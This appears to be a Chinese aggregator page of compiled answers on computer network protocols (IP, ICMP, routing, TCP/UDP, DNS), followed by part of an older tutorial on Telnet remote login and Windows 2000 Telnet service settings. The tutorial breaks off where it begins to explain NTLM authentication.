Ⅰ 我們現在所使用的電腦有哪些網路協議
TCP/IP、HTTP、FTP協議,到OSPF、IGP等協議,有上千種之多。對於普通用戶而言,不需要關心太多的底層通信協議,只需要了解其通信原理即可。
TCP/IP協議族中包括上百個互為關聯的協議,不同功能的協議分布在不同的協議層, 幾個常用協議如下:
1、Telnet(Remote Login):提供遠程登錄功能,一台計算機用戶可以登錄到遠程的另一台計算機上,如同在遠程主機上直接操作一樣。
2、FTP(File Transfer Protocol):遠程文件傳輸協議,允許用戶將遠程主機上的文件拷貝到自己的計算機上。
3、SMTP(Simple Mail transfer Protocol):簡單郵政傳輸協議,用於傳輸電子郵件。
4、NFS(Network File Server):網路文件伺服器,可使多台計算機透明地訪問彼此的目錄。
5、UDP(User Datagram Protocol):用戶數據包協議,它和TCP一樣位於傳輸層,和IP協議配合使用,在傳輸數據時省去包頭,但它不能提供數據包的重傳,所以適合傳輸較短的文件。
HTTP協議
HTTP是一個屬於應用層的面向對象的協議,由於其簡捷、快速的方式,適用於分布式超媒體信息系統。它於1990年提出,經過幾年的使用與發展,得到不斷地完善和擴展。目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的規范化工作正在進行之中,而且HTTP-NG(Next Generation of HTTP)的建議已經提出。
HTTP協議的主要特點可概括如下:
1.支持客戶/伺服器模式。
2.簡單快速:客戶向伺服器請求服務時,只需傳送請求方法和路徑。請求方法常用的有GET、HEAD、POST。每種方法規定了客戶與伺服器聯系的類型不同。
由於HTTP協議簡單,使得HTTP伺服器的程序規模小,因而通信速度很快。
3.靈活:HTTP允許傳輸任意類型的數據對象。正在傳輸的類型由Content-Type加以標記。
4.無連接:無連接的含義是限制每次連接只處理一個請求。伺服器處理完客戶的請求,並收到客戶的應答後,即斷開連接。採用這種方式可以節省傳輸時間。
5.無狀態:HTTP協議是無狀態協議。無狀態是指協議對於事務處理沒有記憶能力。缺少狀態意味著如果後續處理需要前面的信息,則它必須重傳,這樣可能導致每次連接傳送的數據量增大。另一方面,在伺服器不需要先前信息時它的應答就較快。
Ⅱ 常見的網路協議有哪些
第一章 概述
電信網、計算機網和有線電視網 三網合一
TCP/IP是當前的網際網路協議簇的總稱,TCP和 IP是其中的兩個最重要的協議。
RFC標准軌跡由3個成熟級構成:提案標准、草案標准和標准。
第二章 計算機網路與網際網路體系結構
根據拓撲結構:計算機網路可以分為匯流排型網、環型網、星型網和格狀網。
根據覆蓋范圍:計算機網路可以分為廣域網、城域網、區域網和個域網。
網路可以劃分成:資源子網和通信子網兩個部分。
網路協議是通信雙方共同遵守的規則和約定的集合。網路協議包括三個要素,即語法、語義和同步規則。
通信雙方對等層中完成相同協議功能的實體稱為對等實體 ,對等實體按協議進行通信。
有線接入技術分為銅線接入、光纖接入和混合光纖同軸接入技術。
無線接入技術主要有衛星接入技術、無線本地環路接入和本地多點分配業務。
網關實現不同網路協議之間的轉換。
網際網路採用了網路級互聯技術,網路級的協議轉換不僅增加了系統的靈活性,而且簡化了網路互聯設備。
網際網路對用戶隱藏了底層網路技術和結構,在用戶看來,網際網路是一個統一的網路。
網際網路將任何一個能傳輸數據分組的通信系統都視為網路,這些網路受到網路協議的平等對待。
TCP/IP 協議分為 4 個協議層 :網路介面層、網路層、傳輸層和應用層。
IP 協議既是網路層的核心協議 ,也是 TCP/IP 協議簇中的核心協議。
第四章 地址解析
建立邏輯地址與物理地址之間 映射的方法 通常有靜態映射和動態映射。動態映射是在需要獲得地址映射關系時利用網路通信協議直接從其他主機上獲得映射信息。 網際網路採用了動態映射的方法進行地址映射。
獲得邏輯地址與物理地址之間的映射關系稱為地址解析 。
地址解析協議 ARP 是將邏輯地址( IP 地址)映射到物理地址的動態映射協議。
ARP 高速緩存中含有最近使用過的 IP 地址與物理地址的映射列表。
在 ARP 高速緩存中創建的靜態表項是永不超時的地址映射表項。
反向地址解析協議 RARP 是將給定的物理地址映射到邏輯地址( IP地址)的動態映射。RARP需要有RARP 伺服器幫助完成解析。
ARP請求和 RARP請求,都是採用本地物理網路廣播實現的。
在代理ARP中,當主機請求對隱藏在路由器後面的子網中的某一主機 IP 地址進行解析時,代理 ARP路由器將用自己的物理地址作為解析結果進行響應。
第五章 IP協議
IP是不可靠的無連接數據報協議,提供盡力而為的傳輸服務。
TCP/IP 協議的網路層稱為IP層.
IP數據報在經過路由器進行轉發時一般要進行三個方面的處理:首部校驗、路由選擇、數據分片
IP層通過IP地址實現了物理地址的統一,通過IP數據報實現了物理數據幀的統一。 IP 層通過這兩個方面的統一屏蔽了底層的差異,向上層提供了統一的服務。
IP 數據報由首部和數據兩部分構成 。首部分為定長部分和變長部分。選項是數據報首部的變長部分。定長部分 20 位元組,選項不超過40位元組。
IP 數據報中首部長度以 32 位字為單位 ,數據報總長度以位元組為單位,片偏移以 8 位元組( 64 比特)為單位。數據報中的數據長度 =數據報總長度-首部長度× 4。
IP 協議支持動態分片 ,控制分片和重組的欄位是標識、標志和片偏移, 影響分片的因素是網路的最大傳輸單元 MTU ,MTU 是物理網路幀可以封裝的最大數據位元組數。通常不同協議的物理網路具有不同的MTU 。分片的重組只能在信宿機進行。
生存時間TTL是 IP 數據報在網路上傳輸時可以生存的最大時間,每經過一個路由器,數據報的TTL值減 1。
IP數據報只對首部進行校驗 ,不對數據進行校驗。
IP選項用於網路控制和測試 ,重要包括嚴格源路由、寬松源路由、記錄路由和時間戳。
IP協議的主要功能 包括封裝 IP 數據報,對數據報進行分片和重組,處理數據環回、IP選項、校驗碼和TTL值,進行路由選擇等。
在IP 數據報中與分片相關的欄位是標識欄位、標志欄位和片偏移欄位。
數據報標識是分片所屬數據報的關鍵信息,是分片重組的依據
分片必須滿足兩個條件: 分片盡可能大,但必須能為幀所封裝 ;片中數據的大小必須為 8 位元組的整數倍 ,否則 IP 無法表達其偏移量。
分片可以在信源機或傳輸路徑上的任何一台路由器上進行,而分片的重組只能在信宿機上進行片重組的控制主要根據 數據報首部中的標識、標志和片偏移欄位
IP選項是IP數據報首部中的變長部分,用於網路控制和測試目的 (如源路由、記錄路由、時間戳等 ),IP選項的最大長度 不能超過40位元組。
1、IP 層不對數據進行校驗。
原因:上層傳輸層是端到端的協議,進行端到端的校驗比進行點到點的校驗開銷小得多,在通信線路較好的情況下尤其如此。另外,上層協議可以根據對於數據可靠性的要求, 選擇進行校驗或不進行校驗,甚至可以考慮採用不同的校驗方法,這給系統帶來很大的靈活性。
2、IP協議對IP數據報首部進行校驗。
原因: IP 首部屬於 IP 層協議的內容,不可能由上層協議處理。
IP 首部中的部分欄位在點到點的傳遞過程中是不斷變化的,只能在每個中間點重新形成校驗數據,在相鄰點之間完成校驗。
3、分片必須滿足兩個條件:
分片盡可能大,但必須能為幀所封裝 ;
片中數據的大小必須為8位元組的整數倍,否則IP無法表達其偏移量。
第六章 差錯與控制報文協議(ICMP)
ICMP 協議是 IP 協議的補充,用於IP層的差錯報告、擁塞控制、路徑控制以及路由器或主機信息的獲取。
ICMP既不向信宿報告差錯,也不向中間的路由器報告差錯,而是 向信源報告差錯 。
ICMP與 IP協議位於同一個層次,但 ICMP報文被封裝在IP數據報的數據部分進行傳輸。
ICMP 報文可以分為三大類:差錯報告、控制報文和請求 /應答報文。
ICMP 差錯報告分為三種 :信宿不可達報告、數據報超時報告和數據報參數錯報告。數據報超時報告包括 TTL 超時和分片重組超時。
數據報參數錯包括數據報首部中的某個欄位的值有錯和數據報首部中缺少某一選項所必須具有的部分參數。
ICMP控制報文包括源抑制報文和重定向報文。
擁塞是無連接傳輸時缺乏流量控制機制而帶來的問題。ICMP 利用源抑制的方法進行擁塞控制 ,通過源抑制減緩信源發出數據報的速率。
源抑制包括三個階段 :發現擁塞階段、解決擁塞階段和恢復階段。
ICMP 重定向報文由位於同一網路的路由器發送給主機,完成對主機的路由表的刷新。
ICMP 回應請求與應答不僅可以被用來測試主機或路由器的可達性,還可以被用來測試 IP 協議的工作情況。
ICMP時間戳請求與應答報文用於設備間進行時鍾同步 。
主機利用 ICMP 路由器請求和通告報文不僅可以獲得默認路由器的 IP 地址,還可以知道路由器是否處於活動狀態。
第七章 IP 路由
數據傳遞分為直接傳遞和間接傳遞 ,直接傳遞是指直接傳到最終信宿的傳輸過程。間接傳遞是指在信
源和信宿位於不同物理網路時,所經過的一些中間傳遞過程。
TCP/IP 採用 表驅動的方式 進行路由選擇。在每台主機和路由器中都有一個反映網路拓撲結構的路由表,主機和路由器能夠根據 路由表 所反映的拓撲信息找到去往信宿機的正確路徑。
通常路由表中的 信宿地址採用網路地址 。路徑信息採用去往信宿的路徑中的下一跳路由器的地址表示。
路由表中的兩個特殊表目是特定主機路由和默認路由表目。
路由表的建立和刷新可以採用兩種不同 的方式:靜態路由和動態路由。
自治系統 是由獨立管理機構所管理的一組網路和路由器組成的系統。
路由器自動獲取路徑信息的兩種基本方法是向量—距離演算法和鏈路 —狀態演算法。
1、向量 — 距離 (Vector-Distance,簡稱 V—D)演算法的基本思想 :路由器周期性地向與它相鄰的路由器廣播路徑刷新報文,報文的主要內容是一組從本路由器出發去往信宿網路的最短距離,在報文中一般用(V,D)序偶表示,這里的 V 代表向量,標識從該路由器可以到達的信宿 (網路或主機 ),D 代表距離,指出從該路由器去往信宿 V 的距離, 距離 D 按照去往信宿的跳數計。 各個路由器根據收到的 (V ,D)報文,按照最短路徑優先原則對各自的路由表進行刷新。
向量 —距離演算法的優點是簡單,易於實現。
缺點是收斂速度慢和信息交換量較大。
2、鏈路 — 狀態 (Link-Status,簡稱 L-S)演算法的基本思想 :系統中的每個路由器通過從其他路由器獲得的信息,構造出當前網路的拓撲結構,根據這一拓撲結構,並利用 Dijkstra 演算法形成一棵以本路由器為根的最短路徑優先樹, 由於這棵樹反映了從本節點出發去往各路由節點的最短路徑, 所以本節點就可以根據這棵最短路徑優先樹形成路由表。
動態路由所使用的路由協議包括用於自治系統內部的 內部網關協 議和用於自治系統之間的外部網關協議。
RIP協議在基本的向量 —距離演算法的基礎上 ,增加了對路由環路、相同距離路徑、失效路徑以及慢收斂問題的處理。 RIP 協議以路徑上的跳數作為該路徑的距離。 RIP 規定,一條有效路徑的距離不能超過
RIP不適合大型網路。
RIP報文被封裝在 UDP 數據報中傳輸。RIP使用 UDP 的 520 埠號。
3、RIP 協議的三個要點
僅和相鄰路由器交換信息。
交換的信息是當前本路由器所知道的全部信息,即自己的路由表。
按固定的時間間隔交換路由信息,例如,每隔30秒。
4、RIP 協議的優缺點
RIP 存在的一個問題是當網路出現故障時,要經過比較長的時間才能將此信息傳送到所有的路由器。
RIP 協議最大的優點就是實現簡單,開銷較小。
RIP 限制了網路的規模,它能使用的最大距離為15(16表示不可達)。
路由器之間交換的路由信息是路由器中的完整路由表,因而隨著網路規模的擴大,開銷也就增加。
5、為了防止計數到無窮問題,可以採用以下三種技術。
1)水平 分割 法(Split Horizon) 水平分割法的基本思想:路由器從某個介面接收到的更新信息不允許再從這個介面發回去。在圖 7-9 所示的例子中, R2 向 R1 發送 V-D 報文時,不能包含經過 R1 去往 NET1的路徑。因為這一信息本身就是 R1 所產生的。
2) 保持法 (Hold Down) 保持法要求路由器在得知某網路不可到達後的一段時間內,保持此信息不變,這段時間稱為保持時間,路由器在保持時間內不接受關於此網路的任何可達性信息。
3) 毒性逆轉法 (Poison Reverse)毒性逆轉法是水平分割法的一種變化。當從某一介面發出信息時,凡是從這一介面進來的信息改變了路由表表項的, V-D 報文中對應這些表目的距離值都設為無窮 (16)。
OSPF 將自治系統進一步劃分為區域,每個區域由位於同一自治系統中的一組網路、主機和路由器構成。區域的劃分不僅使得廣播得到了更好的管理,而且使 OSPF能夠支持大規模的網路。
OSPF是一個鏈路 —狀態協議。當網路處於收斂狀態時, 每個 OSPF路由器利用 Dijkstra 演算法為每個網路和路由器計算最短路徑,形成一棵以本路由器為根的最短路徑優先 (SPF)樹,並根據最短路徑優先樹構造路由表。
OSPF直接使用 IP。在IP首部的協議欄位, OSPF協議的值為 89。
BGP 是採用路徑 —向量演算法的外部網關協議 , BGP 支持基於策略的路由,路由選擇策略與政治、經濟或安全等因素有關。
BGP 報文分為打開、更新、保持活動和通告 4 類。BGP 報文被封裝在 TCP 段中傳輸,使用TCP的179 號埠 。
第八章 傳輸層協議
傳輸層承上啟下,屏蔽通信子網的細節,向上提供通用的進程通信服務。傳輸層是對網路層的加強與彌補。 TCP 和 UDP 是傳輸層 的兩大協議。
埠分配有兩種基本的方式:全局埠分配和本地埠分配。
在網際網路中採用一個 三元組 (協議,主機地址,埠號)來全局惟一地標識一個進程。用一個五元組(協議 ,本地主機地址 ,本地埠號 ,遠地主機地址 ,遠地埠號)來描述兩個進程的關聯。
TCP 和 UDP 都是提供進程通信能力的傳輸層協議。它們各有一套埠號,兩套埠號相互獨立,都是從0到 65535。
TCP 和 UDP 在計算校驗和時引入偽首部的目的是為了能夠驗證數據是否傳送到了正確的信宿端。
為了實現數據的可靠傳輸, TCP 在應用進程間 建立傳輸連接 。TCP 在建立連接時採用 三次握手方法解決重復連接的問題。在拆除連接時採用 四次握手 方法解決數據丟失問題。
建立連接前,伺服器端首先被動打開其熟知的埠,對埠進行監聽。當客戶端要和伺服器建立連接時,發出一個主動打開埠的請求,客戶端一般使用臨時埠。
TCP 採用的最基本的可靠性技術 包括流量控制、擁塞控制和差錯控制。
TCP 採用 滑動窗口協議 實現流量控制,滑動窗口協議通過發送方窗口和接收方窗口的配合來完成傳輸控制。
TCP 的 擁塞控制 利用發送方的窗口來控制注入網路的數據流的速度。發送窗口的大小取通告窗口和擁塞窗口中小的一個。
TCP通過差錯控制解決 數據的毀壞、重復、失序和丟失等問題。
UDP 在 IP 協議上增加了進程通信能力。此外 UDP 通過可選的校驗和提供簡單的差錯控制。但UDP不提供流量控制和數據報確認 。
1、傳輸層( Transport Layer)的任務 是向用戶提供可靠的、透明的端到端的數據傳輸,以及差錯控制和流量控制機制。
2 「傳輸層提供應用進程間的邏輯通信 」。「邏輯通信 」的意思是:傳輸層之間的通信好像是沿水平方向傳送數據。但事實上這兩個傳輸層之間並沒有一條水平方向的物理連接。
TCP 提供的可靠傳輸服務有如下五個特徵 :
面向數據流 ; 虛電路連接 ; 有緩沖的傳輸 ; 無結構的數據流 ; 全雙工連接 .
3、TCP 採用一種名為 「帶重傳功能的肯定確認 ( positive acknowledge with retransmission ) 」的技術作為提供可靠數據傳輸服務的基礎。
第九章 域名系統
字元型的名字系統為用戶提供了非常直觀、便於理解和記憶的方法,非常符合用戶的命名習慣。
網際網路採用層次型命名機制 ,層次型命名機制將名字空間分成若乾子空間,每個機構負責一個子空間的管理。 授權管理機構可以將其管理的子名字空間進一步劃分, 授權給下一級機構管理。名字空間呈一種樹形結構。
域名由圓點 「.」分開的標號序列構成 。若域名包含從樹葉到樹根的完整標號串並以圓點結束,則稱該域名為完全合格域名FQDN。
常用的三塊頂級域名 為通用頂級域名、國家代碼頂級域名和反向域的頂級域名。
TCP/IP 的域名系統是一個有效的、可靠的、通用的、分布式的名字 —地址映射系統。區域是 DNS 伺服器的管理單元,通常是指一個 DNS 伺服器所管理的名字空間 。區域和域是不同的概念,域是一個完整的子樹,而區域可以是子樹中的任何一部分。
名字伺服器的三種主要類型是 主名字伺服器、次名字伺服器和惟高速緩存名字伺服器。主名字伺服器擁有一個區域文件的原始版本,次名字伺服器從主名字伺服器那裡獲得區域文件的拷貝,次名字伺服器通過區域傳輸同主名字伺服器保持同步。
DNS 伺服器和客戶端屬於 TCP/IP 模型的應用層, DNS 既可以使用 UDP,也可以使用 TCP 來進行通信。 DNS 伺服器使用 UDP 和 TCP 的 53 號熟知埠。
DNS 伺服器能夠使用兩種類型的解析: 遞歸解析和反復解析 。
DNS 響應報文中的回答部分、授權部分和附加信息部分由資源記錄構成,資源記錄存放在名字伺服器的資料庫中。
頂級域 cn 次級域 e.cn 子域 njust.e.cn 主機 sery.njust.e.cn
TFTP :普通文件傳送協議( Trivial File Transfer Protocol )
RIP: 路由信息協議 (Routing Information Protocol)
OSPF 開放最短路徑優先 (Open Shortest Path First)協議。
EGP 外部網關協議 (Exterior Gateway Protocol)
BGP 邊界網關協議 (Border Gateway Protocol)
DHCP 動態主機配置協議( Dynamic Host Configuration Protocol)
Telnet工作原理 : 遠程主機連接服務
FTP 文件傳輸工作原理 File Transfer Protocol
SMTP 郵件傳輸模型 Simple Message Transfer Protocol
HTTP 工作原理
Ⅲ 遠程登錄使用的是什麼協議
Internet遠程登錄使用的協議是使用Telnet協議,使自己的計算機暫時成為遠程計算機的一個模擬終端的過程。
Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標准協議和主要方式。它為用戶提供了在本地計算機上完成遠程主機工作的能力。在終端使用者的電腦上使用telnet程序,用它連接到伺服器。終端使用者可以在telnet程序中輸入命令,這些命令會在伺服器上運行,就像直接在伺服器的控制台上輸入一樣。可以在本地就能控制伺服器。要開始一個telnet會話,必須輸入用戶名和密碼來登錄伺服器。Telnet是常用的遠程式控制制Web伺服器的方法。
Ⅳ 如何連接到遠程計算機有幾種說幾種要詳細點。
一 摘要
二 遠程登錄
三 Telnet協議
四 Win2000的Telnet服務
五 在telnet中該做什麼
六 結束語
一 摘要
Telnet的應用不僅方便了我們進行遠程登錄,也給hacker們提供了又一種入侵手段和後門,但無論如何,在你盡情享受Telnet所帶給你的便捷的同時,你是否真正的了解Telnet呢?
二 遠程登錄
Telnet服務雖然也屬於客戶機/伺服器模型的服務,但它更大的意義在於實現了基於Telnet協議的遠程登錄(遠程互動式計算),那麼就讓我們來認識一下遠程登錄。
1 遠程登陸的基本概念
先來看看什麼叫登錄:分時系統允許多個用戶同時使用一台計算機,為了保證系統的安全和記帳方便,系統要求每個用戶有單獨的帳號作為登錄標識,系統還為每個用戶指定了一個口令。用戶在使用該系統之前要輸入標識和口令,這個過程被稱為'登錄'。
遠程登陸是指用戶使用Telnet命令,使自己的計算機暫時成為遠程主機的一個模擬終端的過程。模擬終端等效於一個非智能的機器,它只負責把用戶輸入的每個字元傳遞給主機,再將主機輸出的每個信息回顯在屏幕上。
2 遠程登陸的產生及發展
我們可以先構想一個提供遠程文字編輯的服務,這個服務的實現需要一個接受編輯文件請求和數據的伺服器以及一個發送此請求的客戶機。客戶機將建立一個從本地機到伺服器的TCP連接,當然這需要伺服器的應答,然後向伺服器發送鍵入的信息(文件編輯信息),並讀取從伺服器返回的輸出。以上便是一個標准而普通的客戶機/伺服器模型的服務。
似乎有了客戶機/伺服器模型的服務,一切遠程問題都可以解決了。然而實際並非你想像的那樣簡單,如果我們僅需要遠程編輯文件,那麼剛才所構想的服務完全可以勝任,但假如我們的要求並不是這么簡單,我們還想實現遠程用戶管理,遠程數據錄入,遠程系統維護,想實現一切可以在遠程主機上實現的操作,那麼我們將需要大量專用的伺服器程序並為每一個可計算服務都使用一個伺服器進程,隨之而來的問題是:遠程機器會很快對伺服器進程應接不暇,並淹沒在進程的海洋里(我們在這里排除最專業化的遠程機器)。
那麼有沒有辦法解決呢?當然有,我們可以用遠程登錄來解決這一切。我們允許用戶在遠地機器上建立一個登錄會話,然後通過執行命令來實現更一般的服務,就像在本地操作一樣。這樣,我們便可以訪問遠地系統上所有可用的命令,並且系統設計員不需提供多個專用地伺服器程序。
問題發展到這里好像前途一片光明了,用遠程登錄總應該解決問題了吧,但要實現遠程登陸並不簡單。不考慮網路設計的計算機系統期望用戶只從直接相連的鍵盤和顯示器上登錄,在這種機器上增加遠程登陸功能需要修改機器的操作系統,這是極其艱巨也是我們盡量避免的。因此我們應該集中力量構造遠程登陸伺服器軟體,雖然這樣也是比較困難的。為什麼說這樣做也比較困難呢?
舉個例子來說:一般,操作系統會為一些特殊按鍵分配特殊的含義,比如本地系統將'Ctrl+C'解釋為:'終止當前運行的命令進程'。但假設我們已經運行了遠程登陸伺服器軟體,'Ctrl+C'也有可能無法被傳送到遠地機器,如果客戶機真的將'Ctrl+C'傳到了遠地機器,那麼'Ctrl+C'這個命令有可能不能終止本地的進程,也就是說在這里很可能會產生混亂。而且這僅僅是遇到的難題之一。
但盡管有技術上的困難,系統編程人員還是設法構造了能夠應用於大多數操作系統的遠程登陸伺服器軟體,並構造了充當客戶機的應用軟體。通常,客戶機軟體取消了除一個鍵以外的所有鍵的本地解釋,並將這些本地解釋相應的轉換成遠地解釋,這就使得客戶機軟體與遠地機器的交互,就如同坐在遠程主機面前一樣,從而避免了上述所提到的混亂。而那個唯一例外的鍵,可以使用戶回到本地環境。
將遠程登陸伺服器設計為應用級軟體,還有另一個要求,那就是需要操作系統提供對偽終端(pseudo terminal)的支持。我們用偽終端描述操作系統的入口點,它允許像Telnet伺服器一樣的程序向操作系統傳送字元,並且使得字元像是來自本地鍵盤一樣。只有使用這樣的操作系統,才能將遠程登陸伺服器設計為應用級軟體(比如Telnet伺服器軟體),否則,本地操作系統和遠地系統傳送將不能識別從對方傳送過來的信息(因為它們僅能識別從本地鍵盤所鍵入的信息),遠程登陸將宣告失敗。
將遠程登陸伺服器設計為應用級軟體雖然有其顯著的優點:比將代碼嵌入操作系統更易修改和控制伺服器。但其也有效率不高的缺點(後面的內容將會給予解釋),好在用戶鍵入信息的速率不高,這種設計還是可以接受的。
3 遠程登錄的工作過程
使用Telnet協議進行遠程登陸時需要滿足以下條件:在本的計算機上必須裝有包含Telnet協議的客戶程序;必須知道遠程主機的Ip地址或域名;必須知道登錄標識與口令。
Telnet遠程登錄服務分為以下4個過程:
1)本地與遠程主機建立連接。該過程實際上是建立一個TCP連接,用戶必須知道遠程主機的Ip地址或域名;
2)將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字元以NVT(Net Virtual Terminal)格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據報;
3)將遠程主機輸出的NVT格式的數據轉化為本地所接受的格式送回本地終端,包括輸入命令回顯和命令執行結果;
4)最後,本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。
上面的內容只是討論了遠程登陸最基本的東西,其中的復雜和編程人員的艱辛是我們難以想像的,不知道你在舒服的使用Telnet的同時,是否想到了這些!
三 Telnet協議
我們知道Telnet伺服器軟體是我們最常用的遠程登錄伺服器軟體,是一種典型的客戶機/伺服器模型的服務,它應用Telnet協議來工作。那麼,什麼是Telnet協議?它都具備哪些特點呢?
1 基本內容
Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標准協議。應用Telnet協議能夠把本地用戶所使用的計算機變成遠程主機系統的一個終端。它提供了三種基本服務:
1)Telnet定義一個網路虛擬終端為遠的系統提供一個標准介面。客戶機程序不必詳細了解遠的系統,他們只需構造使用標准介面的程序;
2)Telnet包括一個允許客戶機和伺服器協商選項的機制,而且它還提供一組標准選項;
3)Telnet對稱處理連接的兩端,即Telnet不強迫客戶機從鍵盤輸入,也不強迫客戶機在屏幕上顯示輸出。
2 適應異構
為了使多個操作系統間的Telnet交互操作成為可能,就必須詳細了解異構計算機和操作系統。比如,一些操作系統需要每行文本用ASCII回車控制符(CR)結束,另一些系統則需要使用ASCII換行符(LF),還有一些系統需要用兩個字元的序列回車-換行(CR-LF);再比如,大多數操作系統為用戶提供了一個中斷程序運行的快捷鍵,但這個快捷鍵在各個系統中有可能不同(一些系統使用CTRL+C,而另一些系統使用ESCAPE)。如果不考慮系統間的異構性,那麼在本地發出的字元或命令,傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此,Telnet協議必須解決這個問題。
為了適應異構環境,Telnet協議定義了數據和命令在Internet上的傳輸方式,此定義被稱作網路虛擬終端NVT(Net Virtual Terminal)。它的應用過程如下:
對於發送的數據:客戶機軟體把來自用戶終端的按鍵和命令序列轉換為NVT格式,並發送到伺服器,伺服器軟體將收到的數據和命令,從NVT格式轉換為遠地系統需要的格式;
對於返回的數據:遠地伺服器將數據從遠地機器的格式轉換為NVT格式,而本地客戶機將將接收到的NVT格式數據再轉換為本地的格式。
對於NVT格式的詳細定義,有興趣的朋友可以去查找相關資料。
3 傳送遠地命令
我們知道絕大多數操作系統都提供各種快捷鍵來實現相應的控制命令,當用戶在本地終端鍵入這些快捷鍵的時候,本地系統將執行相應的控制命令,而不把這些快捷鍵作為輸入。那麼對於Telnet來說,它是用什麼來實現控制命令的遠地傳送呢?
Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到伺服器。我們知道USASCII字元集包括95個可列印字元和33個控制碼。當用戶從本地鍵入普通字元時,NVT將按照其原始含義傳送;當用戶鍵入快捷鍵(組合鍵)時,NVT將把它轉化為特殊的ASCII字元在網路上傳送,並在其到達遠地機器後轉化為相應的控制命令。將正常ASCII字元集與控制命令區分主要有兩個原因:
1)這種區分意味著Telnet具有更大的靈活性:它可在客戶機與伺服器間傳送所有可能的ASCII字元以及所有控制功能;
2)這種區分使得客戶機可以無二義性的指定信令,而不會產生控制功能與普通字元的混亂。
4 數據流向
上面我們提到過將Telnet設計為應用級軟體有一個缺點,那就是:效率不高。這是為什麼呢?下面給出Telnet中的數據流向:
數據信息被用戶從本地鍵盤鍵入並通過操作系統傳到客戶機程序,客戶機程序將其處理後返回操作系統,並由操作系統經過網路傳送到遠地機器,遠地操作系統將所接收數據傳給伺服器程序,並經伺服器程序再次處理後返回到操作系統上的偽終端入口點,最後,遠地操作系統將數據傳送到用戶正在運行的應用程序,這便是一次完整的輸入過程;輸出將按照同一通路從伺服器傳送到客戶機。
因為每一次的輸入和輸出,計算機將切換進程環境好幾次,這個開銷是很昂貴的。還好用戶的鍵入速率並不算高,這個缺點我們仍然能夠接受。
5 強制命令
我們應該考慮到這樣一種情況:假設本地用戶運行了遠地機器的一個無休止循環的錯誤命令或程序,且此命令或程序已經停止讀取輸入,那麼操作系統的緩沖區可能因此而被占滿,如果這樣,遠地伺服器也無法再將數據寫入偽終端,並且最終導致停止從TCP連接讀取數據,TCP連接的緩沖區最終也會被占滿,從而導致阻止數據流流入此連接。如果以上事情真的發生了,那麼本地用戶將失去對遠地機器的控制。
為了解決此問題,Telnet協議必須使用外帶信令以便強制伺服器讀取一個控制命令。我們知道TCP用緊急數據機制實現外帶數據信令,那麼Telnet只要再附加一個被稱為數據標記(date mark)的保留八位組,並通過讓TCP發送已設置緊急數據比特的報文段通知伺服器便可以了,攜帶緊急數據的報文段將繞過流量控制直接到達伺服器。作為對緊急信令的相應,伺服器將讀取並拋棄所有數據,直到找到了一個數據標記。伺服器在遇到了數據標記後將返回正常的處理過程。
6 選項協商
由於Telnet兩端的機器和操作系統的異構性,使得Telnet不可能也不應該嚴格規定每一個telnet連接的詳細配置,否則將大大影響Telnet的適應異構性。因此,Telnet採用選項協商機制來解決這一問題。
Telnet選項的范圍很廣:一些選項擴充了大方向的功能,而一些選項制涉及一些微小細節。例如:有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作(大方向);還有一個選項允許遠地機器上的伺服器決定用戶終端類型(小細節)。
Telnet選項的協商方式也很有意思,它對於每個選項的處理都是對稱的,即任何一端都可以發出協商申請;任何一端都可以接受或拒絕這個申請。另外,如果一端試圖協商另一端不了解的選項,接受請求的一端可簡單的拒絕協商。因此,有可能將更新,更復雜的Telnet客戶機伺服器版本與較老的,不太復雜的版本進行交互操作。如果客戶機和伺服器都理解新的選項,可能會對交互有所改善。否則,它們將一起轉到效率較低但可工作的方式下運行。所有的這些設計,都是為了增強適應異構性,可見Telnet的適應異構性對其的應用和發展是多麼重要。
上面討論了一些原理方面的東西,雖然我們在Telnet的使用過程中很難接觸到這一層面,但我認為了解這些是有意義的,它會給我們帶來許多啟示。下面讓我們來看看Win2000的Telnet服務。
(本系列教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區 http://ccbirds.yeah.net)
四 Win2000的Telnet服務
其實從應用層面上,Win2000的Telnet服務並沒有什麼可說的,絕大部分內容你都可以從HELP文件中得到,我在此只是把它稍微整理一下而已。
1 基本配置
Win2000為我們提供了Telnet客戶機和伺服器程序:Telnet.exe是客戶機程序(Client),tlntsvr.exe是伺服器程序(server),同時它還為我們提供了Telnet伺服器管理程序tlntadmn.exe。
Windows 2000 默認安裝了 Telnet 服務,但是並沒有默認啟動。下面給出HELP文件中 Telnet 服務的一部分默認設置:
AllowTrustedDomain:是否允許域用戶訪問。默認值是1,允許信任域用戶訪問。可以改為0: 不允許域用戶訪問(只允許本地用戶)。
DefaultDomain:可以對與該計算機具有信任關系的任何域設置。默認值是"."。
DefaultShell:顯示 shell 安裝的路徑位置。默認值是: %systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins:在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。
LoginScript:顯示 Telnet 伺服器登錄腳本的路徑位置。默認的位置就是「%systemroot%\System32\login.cmd」,你可以更改腳本內容,這樣登錄進Telnet的歡迎屏幕就不一樣了。
NTLM:NTLM身份驗證選項。默認是2。可以有下面這些值:
0: 不使用 NTLM 身份驗證。
1: 先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼。
2: 只使用 NTLM 身份驗證。
TelnetPort:顯示 telnet 伺服器偵聽 telnet 請求的埠。默認是:23。你也可以更改為其他埠。
以上各項設置你可以使用tlntadmn.exe(Telnet伺服器管理程序)來進行非常方便的配置,配置後需要重新啟動Telnet服務。如圖1
2 NTLM
提到了telnet就不能不提NTLM,我想這也是讓入侵者最為頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet默認僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢?
早期的SMB協議在網路上明文傳輸口令,後來出現了"LAN Manager Challenge/Response"驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的:
